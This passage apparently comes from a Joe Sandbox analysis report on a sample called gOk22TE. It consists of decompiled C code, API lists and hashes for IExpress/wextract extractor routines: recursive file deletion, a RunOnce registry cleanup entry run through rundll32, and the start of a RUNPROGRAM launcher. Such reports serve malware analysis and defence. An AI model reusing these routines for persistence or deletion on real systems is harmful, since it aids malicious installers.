                                                                                                                                                                                                                                                						if((_v604.ftCreationTime & 0x00000010) == 0) {
                                                                                                                                                                                                                                                							_t58 = 0x104;
                                                                                                                                                                                                                                                							E010E16B3( &_v276, 0x104,  &(_v596.dwReserved1));
                                                                                                                                                                                                                                                							SetFileAttributesA( &_v280, 0x80);
                                                                                                                                                                                                                                                							DeleteFileA( &_v280);
                                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                                							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
                                                                                                                                                                                                                                                								E010E16B3( &_v276, 0x104,  &(_v596.cFileName));
                                                                                                                                                                                                                                                								_t58 = 0x104;
                                                                                                                                                                                                                                                								E010E658A( &_v280, 0x104, 0x10e1140);
                                                                                                                                                                                                                                                								E010E2390( &_v284);
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_t36 = FindNextFileA(_t63,  &_v596); // executed
                                                                                                                                                                                                                                                					} while (_t36 != 0);
                                                                                                                                                                                                                                                					FindClose(_t63); // executed
                                                                                                                                                                                                                                                					_t22 = RemoveDirectoryA(_t65); // executed
                                                                                                                                                                                                                                                					goto L10;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                			}





















                                                                                                                                                                                                                                                0x010e23fc
                                                                                                                                                                                                                                                0x010e2401
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e2407
                                                                                                                                                                                                                                                0x010e2407
                                                                                                                                                                                                                                                0x010e2408
                                                                                                                                                                                                                                                0x010e2411
                                                                                                                                                                                                                                                0x010e241f
                                                                                                                                                                                                                                                0x010e247a
                                                                                                                                                                                                                                                0x010e2483
                                                                                                                                                                                                                                                0x010e2495
                                                                                                                                                                                                                                                0x010e24a3
                                                                                                                                                                                                                                                0x010e2421
                                                                                                                                                                                                                                                0x010e242f
                                                                                                                                                                                                                                                0x010e2453
                                                                                                                                                                                                                                                0x010e245d
                                                                                                                                                                                                                                                0x010e2466
                                                                                                                                                                                                                                                0x010e2472
                                                                                                                                                                                                                                                0x010e2472
                                                                                                                                                                                                                                                0x010e242f
                                                                                                                                                                                                                                                0x010e24af
                                                                                                                                                                                                                                                0x010e24b5
                                                                                                                                                                                                                                                0x010e24be
                                                                                                                                                                                                                                                0x010e24c5
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e24c5

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • FindFirstFileA.KERNELBASE(?,010E8A3A,010E11F4,010E8A3A,00000000,?,?), ref: 010E23F6
                                                                                                                                                                                                                                                • lstrcmpA.KERNEL32(?,010E11F8), ref: 010E2427
                                                                                                                                                                                                                                                • lstrcmpA.KERNEL32(?,010E11FC), ref: 010E243B
                                                                                                                                                                                                                                                • SetFileAttributesA.KERNEL32(?,00000080,?), ref: 010E2495
                                                                                                                                                                                                                                                • DeleteFileA.KERNEL32(?), ref: 010E24A3
                                                                                                                                                                                                                                                • FindNextFileA.KERNELBASE(00000000,00000010), ref: 010E24AF
                                                                                                                                                                                                                                                • FindClose.KERNELBASE(00000000), ref: 010E24BE
                                                                                                                                                                                                                                                • RemoveDirectoryA.KERNELBASE(010E8A3A), ref: 010E24C5
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 836429354-0
                                                                                                                                                                                                                                                • Opcode ID: 531053fb93c78579198812fe796480c4181b047cb8c695d6a26e6161e3fc714d
                                                                                                                                                                                                                                                • Instruction ID: f3b24f1195a857144386457aedbe47beda473108b88a30a1147442ca3bf8cf12
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 531053fb93c78579198812fe796480c4181b047cb8c695d6a26e6161e3fc714d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C331A1723046409FD330EAA6CC8DAEB77ECAFC8701F04492DA5D58B140EF3899098B52
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 70%
                                                                                                                                                                                                                                                			E010E2BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                				void* __ebp;
                                                                                                                                                                                                                                                				long _t4;
                                                                                                                                                                                                                                                				void* _t6;
                                                                                                                                                                                                                                                				intOrPtr _t7;
                                                                                                                                                                                                                                                				void* _t9;
                                                                                                                                                                                                                                                				struct HINSTANCE__* _t12;
                                                                                                                                                                                                                                                				intOrPtr* _t17;
                                                                                                                                                                                                                                                				signed char _t19;
                                                                                                                                                                                                                                                				intOrPtr* _t21;
                                                                                                                                                                                                                                                				void* _t22;
                                                                                                                                                                                                                                                				void* _t24;
                                                                                                                                                                                                                                                				intOrPtr _t32;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t4 = GetVersion();
                                                                                                                                                                                                                                                				if(_t4 >= 0 && _t4 >= 6) {
                                                                                                                                                                                                                                                					_t12 = GetModuleHandleW(L"Kernel32.dll");
                                                                                                                                                                                                                                                					if(_t12 != 0) {
                                                                                                                                                                                                                                                						_t21 = GetProcAddress(_t12, "HeapSetInformation");
                                                                                                                                                                                                                                                						if(_t21 != 0) {
                                                                                                                                                                                                                                                							_t17 = _t21;
                                                                                                                                                                                                                                                							 *0x10ea288(0, 1, 0, 0);
                                                                                                                                                                                                                                                							 *_t21();
                                                                                                                                                                                                                                                							_t29 = _t24 - _t24;
                                                                                                                                                                                                                                                							if(_t24 != _t24) {
                                                                                                                                                                                                                                                								_t17 = 4;
                                                                                                                                                                                                                                                								asm("int 0x29");
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t20 = _a12;
                                                                                                                                                                                                                                                				_t18 = _a4;
                                                                                                                                                                                                                                                				 *0x10e9124 = 0;
                                                                                                                                                                                                                                                				if(E010E2CAA(_a4, _a12, _t29, _t17) != 0) {
                                                                                                                                                                                                                                                					_t9 = E010E2F1D(_t18, _t20); // executed
                                                                                                                                                                                                                                                					_t22 = _t9; // executed
                                                                                                                                                                                                                                                					E010E52B6(0, _t18, _t21, _t22); // executed
                                                                                                                                                                                                                                                					if(_t22 != 0) {
                                                                                                                                                                                                                                                						_t32 =  *0x10e8a3a; // 0x0
                                                                                                                                                                                                                                                						if(_t32 == 0) {
                                                                                                                                                                                                                                                							_t19 =  *0x10e9a2c; // 0x0
                                                                                                                                                                                                                                                							if((_t19 & 0x00000001) != 0) {
                                                                                                                                                                                                                                                								E010E1F90(_t19, _t21, _t22);
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t6 =  *0x10e8588; // 0x0
                                                                                                                                                                                                                                                				if(_t6 != 0) {
                                                                                                                                                                                                                                                					CloseHandle(_t6);
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t7 =  *0x10e9124; // 0x0
                                                                                                                                                                                                                                                				return _t7;
                                                                                                                                                                                                                                                			}



















                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetVersion.KERNEL32(?,00000002,00000000,?,010E6BB0,010E0000,00000000,00000002,0000000A), ref: 010E2C03
                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(Kernel32.dll,?,010E6BB0,010E0000,00000000,00000002,0000000A), ref: 010E2C18
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 010E2C28
                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,010E6BB0,010E0000,00000000,00000002,0000000A), ref: 010E2C98
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Handle$AddressCloseModuleProcVersion
                                                                                                                                                                                                                                                • String ID: HeapSetInformation$Kernel32.dll
                                                                                                                                                                                                                                                • API String ID: 62482547-3460614246
                                                                                                                                                                                                                                                • Opcode ID: ffd37f8d9d7ac43b81733c5afff126f1b58dfa10c66c56bfea9208dd71540d71
                                                                                                                                                                                                                                                • Instruction ID: 1d48701aa665d387c2c3b06bbc4c3469eee0372eae773036b035d141fab33b34
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ffd37f8d9d7ac43b81733c5afff126f1b58dfa10c66c56bfea9208dd71540d71
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 901106713002099FE7346BFBEC4CA6B3FDD9B88B94B040059FAC0DB244CA3AE8518760
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E010E6F40() {
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				SetUnhandledExceptionFilter(E010E6EF0); // executed
                                                                                                                                                                                                                                                				return 0;
                                                                                                                                                                                                                                                			}



                                                                                                                                                                                                                                                0x010e6f45
                                                                                                                                                                                                                                                0x010e6f4d

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 010E6F45
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3192549508-0
                                                                                                                                                                                                                                                • Opcode ID: 6958eb14360333b58a6a069389daf9e1eeace4cbceb1e7b99ea94bfa036dc0c7
                                                                                                                                                                                                                                                • Instruction ID: 0836b0f47164795217a833360d9432150cdf74d9c3ef8bcdcf81ae55d0754bb1
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6958eb14360333b58a6a069389daf9e1eeace4cbceb1e7b99ea94bfa036dc0c7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A09002703511008B96201B73A91D42579D15A5EA42B8154A5B091CD588DB6680405611
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                C-Code - Quality: 93%
                                                                                                                                                                                                                                                			E010E202A(struct HINSTANCE__* __edx) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				char _v268;
                                                                                                                                                                                                                                                				char _v528;
                                                                                                                                                                                                                                                				void* _v532;
                                                                                                                                                                                                                                                				int _v536;
                                                                                                                                                                                                                                                				int _v540;
                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                				signed int _t28;
                                                                                                                                                                                                                                                				long _t36;
                                                                                                                                                                                                                                                				long _t41;
                                                                                                                                                                                                                                                				struct HINSTANCE__* _t46;
                                                                                                                                                                                                                                                				intOrPtr _t49;
                                                                                                                                                                                                                                                				intOrPtr _t50;
                                                                                                                                                                                                                                                				CHAR* _t54;
                                                                                                                                                                                                                                                				void _t56;
                                                                                                                                                                                                                                                				signed int _t66;
                                                                                                                                                                                                                                                				intOrPtr* _t72;
                                                                                                                                                                                                                                                				void* _t73;
                                                                                                                                                                                                                                                				void* _t75;
                                                                                                                                                                                                                                                				void* _t80;
                                                                                                                                                                                                                                                				intOrPtr* _t81;
                                                                                                                                                                                                                                                				void* _t86;
                                                                                                                                                                                                                                                				void* _t87;
                                                                                                                                                                                                                                                				void* _t90;
                                                                                                                                                                                                                                                				_Unknown_base(*)()* _t91;
                                                                                                                                                                                                                                                				signed int _t93;
                                                                                                                                                                                                                                                				void* _t94;
                                                                                                                                                                                                                                                				void* _t95;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t79 = __edx;
                                                                                                                                                                                                                                                				_t28 =  *0x10e8004; // 0x71a8563c
                                                                                                                                                                                                                                                				_v8 = _t28 ^ _t93;
                                                                                                                                                                                                                                                				_t84 = 0x104;
                                                                                                                                                                                                                                                				memset( &_v268, 0, 0x104);
                                                                                                                                                                                                                                                				memset( &_v528, 0, 0x104);
                                                                                                                                                                                                                                                				_t95 = _t94 + 0x18;
                                                                                                                                                                                                                                                				_t66 = 0;
                                                                                                                                                                                                                                                				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
                                                                                                                                                                                                                                                				if(_t36 != 0) {
                                                                                                                                                                                                                                                					L24:
                                                                                                                                                                                                                                                					return E010E6CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_push(_t86);
                                                                                                                                                                                                                                                				_t87 = 0;
                                                                                                                                                                                                                                                				while(1) {
                                                                                                                                                                                                                                                					E010E171E("wextract_cleanup3", 0x50, "wextract_cleanup%d", _t87);
                                                                                                                                                                                                                                                					_t95 = _t95 + 0x10;
                                                                                                                                                                                                                                                					_t41 = RegQueryValueExA(_v532, "wextract_cleanup3", 0, 0, 0,  &_v540); // executed
                                                                                                                                                                                                                                                					if(_t41 != 0) {
                                                                                                                                                                                                                                                						break;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					_t87 = _t87 + 1;
                                                                                                                                                                                                                                                					if(_t87 < 0xc8) {
                                                                                                                                                                                                                                                						continue;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					break;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				if(_t87 != 0xc8) {
                                                                                                                                                                                                                                                					GetSystemDirectoryA( &_v528, _t84);
                                                                                                                                                                                                                                                					_t79 = _t84;
                                                                                                                                                                                                                                                					E010E658A( &_v528, _t84, "advpack.dll");
                                                                                                                                                                                                                                                					_t46 = LoadLibraryA( &_v528); // executed
                                                                                                                                                                                                                                                					_t84 = _t46;
                                                                                                                                                                                                                                                					if(_t84 == 0) {
                                                                                                                                                                                                                                                						L10:
                                                                                                                                                                                                                                                						if(GetModuleFileNameA( *0x10e9a3c,  &_v268, 0x104) == 0) {
                                                                                                                                                                                                                                                							L17:
                                                                                                                                                                                                                                                							_t36 = RegCloseKey(_v532);
                                                                                                                                                                                                                                                							L23:
                                                                                                                                                                                                                                                							_pop(_t86);
                                                                                                                                                                                                                                                							goto L24;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						L11:
                                                                                                                                                                                                                                                						_t72 =  &_v268;
                                                                                                                                                                                                                                                						_t80 = _t72 + 1;
                                                                                                                                                                                                                                                						do {
                                                                                                                                                                                                                                                							_t49 =  *_t72;
                                                                                                                                                                                                                                                							_t72 = _t72 + 1;
                                                                                                                                                                                                                                                						} while (_t49 != 0);
                                                                                                                                                                                                                                                						_t73 = _t72 - _t80;
                                                                                                                                                                                                                                                						_t81 = 0x10e91e4;
                                                                                                                                                                                                                                                						do {
                                                                                                                                                                                                                                                							_t50 =  *_t81;
                                                                                                                                                                                                                                                							_t81 = _t81 + 1;
                                                                                                                                                                                                                                                						} while (_t50 != 0);
                                                                                                                                                                                                                                                						_t84 = _t73 + 0x50 + _t81 - 0x10e91e5;
                                                                                                                                                                                                                                                						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0x10e91e5);
                                                                                                                                                                                                                                                						if(_t90 != 0) {
                                                                                                                                                                                                                                                							 *0x10e8580 = _t66 ^ 0x00000001;
                                                                                                                                                                                                                                                							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
                                                                                                                                                                                                                                                							if(_t66 == 0) {
                                                                                                                                                                                                                                                								_t54 = "%s /D:%s";
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							_push("C:\Users\hardz\AppData\Local\Temp\IXP003.TMP\");
                                                                                                                                                                                                                                                							E010E171E(_t90, _t84, _t54,  &_v268);
                                                                                                                                                                                                                                                							_t75 = _t90;
                                                                                                                                                                                                                                                							_t23 = _t75 + 1; // 0x1
                                                                                                                                                                                                                                                							_t79 = _t23;
                                                                                                                                                                                                                                                							do {
                                                                                                                                                                                                                                                								_t56 =  *_t75;
                                                                                                                                                                                                                                                								_t75 = _t75 + 1;
                                                                                                                                                                                                                                                							} while (_t56 != 0);
                                                                                                                                                                                                                                                							_t24 = _t75 - _t79 + 1; // 0x2
                                                                                                                                                                                                                                                							RegSetValueExA(_v532, "wextract_cleanup3", 0, 1, _t90, _t24); // executed
                                                                                                                                                                                                                                                							RegCloseKey(_v532); // executed
                                                                                                                                                                                                                                                							_t36 = LocalFree(_t90);
                                                                                                                                                                                                                                                							goto L23;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_t79 = 0x4b5;
                                                                                                                                                                                                                                                						E010E44B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
                                                                                                                                                                                                                                                						goto L17;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
                                                                                                                                                                                                                                                					_t66 = 0 | _t91 != 0x00000000;
                                                                                                                                                                                                                                                					FreeLibrary(_t84); // executed
                                                                                                                                                                                                                                                					if(_t91 == 0) {
                                                                                                                                                                                                                                                						goto L10;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                                                                						E010E658A( &_v268, 0x104, 0x10e1140);
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					goto L11;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t36 = RegCloseKey(_v532);
                                                                                                                                                                                                                                                				 *0x10e8530 = _t66;
                                                                                                                                                                                                                                                				goto L23;
                                                                                                                                                                                                                                                			}

































                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e20d3
                                                                                                                                                                                                                                                0x010e20da
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e20da
                                                                                                                                                                                                                                                0x010e20e2
                                                                                                                                                                                                                                                0x010e2103
                                                                                                                                                                                                                                                0x010e210e
                                                                                                                                                                                                                                                0x010e2116
                                                                                                                                                                                                                                                0x010e2122
                                                                                                                                                                                                                                                0x010e2128
                                                                                                                                                                                                                                                0x010e212c
                                                                                                                                                                                                                                                0x010e2179
                                                                                                                                                                                                                                                0x010e2194
                                                                                                                                                                                                                                                0x010e21de
                                                                                                                                                                                                                                                0x010e21e4
                                                                                                                                                                                                                                                0x010e2256
                                                                                                                                                                                                                                                0x010e2256
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e2256
                                                                                                                                                                                                                                                0x010e2196
                                                                                                                                                                                                                                                0x010e2196
                                                                                                                                                                                                                                                0x010e219c
                                                                                                                                                                                                                                                0x010e219f
                                                                                                                                                                                                                                                0x010e219f
                                                                                                                                                                                                                                                0x010e21a1
                                                                                                                                                                                                                                                0x010e21a2
                                                                                                                                                                                                                                                0x010e21a6
                                                                                                                                                                                                                                                0x010e21a8
                                                                                                                                                                                                                                                0x010e21b0
                                                                                                                                                                                                                                                0x010e21b0
                                                                                                                                                                                                                                                0x010e21b2
                                                                                                                                                                                                                                                0x010e21b3
                                                                                                                                                                                                                                                0x010e21bc
                                                                                                                                                                                                                                                0x010e21c7
                                                                                                                                                                                                                                                0x010e21cb
                                                                                                                                                                                                                                                0x010e21f1
                                                                                                                                                                                                                                                0x010e21f6
                                                                                                                                                                                                                                                0x010e21fd
                                                                                                                                                                                                                                                0x010e21ff
                                                                                                                                                                                                                                                0x010e21ff
                                                                                                                                                                                                                                                0x010e2204
                                                                                                                                                                                                                                                0x010e2213
                                                                                                                                                                                                                                                0x010e2218
                                                                                                                                                                                                                                                0x010e221d
                                                                                                                                                                                                                                                0x010e221d
                                                                                                                                                                                                                                                0x010e2220
                                                                                                                                                                                                                                                0x010e2220
                                                                                                                                                                                                                                                0x010e2222
                                                                                                                                                                                                                                                0x010e2223
                                                                                                                                                                                                                                                0x010e2229
                                                                                                                                                                                                                                                0x010e223d
                                                                                                                                                                                                                                                0x010e2249
                                                                                                                                                                                                                                                0x010e2250
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e2250
                                                                                                                                                                                                                                                0x010e21d2
                                                                                                                                                                                                                                                0x010e21d9
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e21d9
                                                                                                                                                                                                                                                0x010e213a
                                                                                                                                                                                                                                                0x010e2141
                                                                                                                                                                                                                                                0x010e2144
                                                                                                                                                                                                                                                0x010e214c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e2163
                                                                                                                                                                                                                                                0x010e2172
                                                                                                                                                                                                                                                0x010e2172
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e2163
                                                                                                                                                                                                                                                0x010e20ea
                                                                                                                                                                                                                                                0x010e20f0
                                                                                                                                                                                                                                                0x00000000

APIs
• memset.MSVCRT ref: 010E2050
• memset.MSVCRT ref: 010E205F
• RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 010E208C
  • Part of subcall function 010E171E: _vsnprintf.MSVCRT ref: 010E1750
• RegQueryValueExA.KERNELBASE(?,wextract_cleanup3,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010E20C9
• RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010E20EA
• GetSystemDirectoryA.KERNEL32 ref: 010E2103
• LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010E2122
• GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 010E2134
• FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010E2144
• GetSystemDirectoryA.KERNEL32 ref: 010E215B
• GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010E218C
• LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010E21C1
• RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010E21E4
• RegSetValueExA.KERNELBASE(?,wextract_cleanup3,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 010E223D
• RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010E2249
• LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010E2250
Strings
Memory Dump Source
• Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
• Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
Similarity
• API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
• String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP003.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup3
• API String ID: 178549006-1281856606
• Opcode ID: 8721151be2ce48389aba8df63ad2cabe259ab1fa513347850f1c3bb4bc49dc66
• Instruction ID: 61413f4f215ee9dfda85ec6e159f34a4e4b34b7e3e60d47f79192310cd9be37a
• Opcode Fuzzy Hash: 8721151be2ce48389aba8df63ad2cabe259ab1fa513347850f1c3bb4bc49dc66
• Instruction Fuzzy Hash: B6510572A00214AFDB309B67DC4CFEA7BECEB54B40F0041E9BAC5EB145DA769E448B50
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 92%
                                                                                                                                                                                                                                                			E010E55A0(void* __eflags) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				char _v265;
                                                                                                                                                                                                                                                				char _v268;
                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                				signed int _t28;
                                                                                                                                                                                                                                                				int _t32;
                                                                                                                                                                                                                                                				int _t33;
                                                                                                                                                                                                                                                				int _t35;
                                                                                                                                                                                                                                                				signed int _t36;
                                                                                                                                                                                                                                                				signed int _t38;
                                                                                                                                                                                                                                                				int _t40;
                                                                                                                                                                                                                                                				int _t44;
                                                                                                                                                                                                                                                				long _t48;
                                                                                                                                                                                                                                                				int _t49;
                                                                                                                                                                                                                                                				int _t50;
                                                                                                                                                                                                                                                				signed int _t53;
                                                                                                                                                                                                                                                				int _t54;
                                                                                                                                                                                                                                                				int _t59;
                                                                                                                                                                                                                                                				char _t60;
                                                                                                                                                                                                                                                				int _t65;
                                                                                                                                                                                                                                                				char _t66;
                                                                                                                                                                                                                                                				int _t67;
                                                                                                                                                                                                                                                				int _t68;
                                                                                                                                                                                                                                                				int _t69;
                                                                                                                                                                                                                                                				int _t70;
                                                                                                                                                                                                                                                				int _t71;
                                                                                                                                                                                                                                                				struct _SECURITY_ATTRIBUTES* _t72;
                                                                                                                                                                                                                                                				int _t73;
                                                                                                                                                                                                                                                				CHAR* _t82;
                                                                                                                                                                                                                                                				CHAR* _t88;
                                                                                                                                                                                                                                                				void* _t103;
                                                                                                                                                                                                                                                				signed int _t110;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t28 =  *0x10e8004; // 0x71a8563c
                                                                                                                                                                                                                                                				_v8 = _t28 ^ _t110;
                                                                                                                                                                                                                                                				_t2 = E010E468F("RUNPROGRAM", 0, 0) + 1; // 0x1
                                                                                                                                                                                                                                                				_t109 = LocalAlloc(0x40, _t2);
                                                                                                                                                                                                                                                				if(_t109 != 0) {
                                                                                                                                                                                                                                                					_t82 = "RUNPROGRAM";
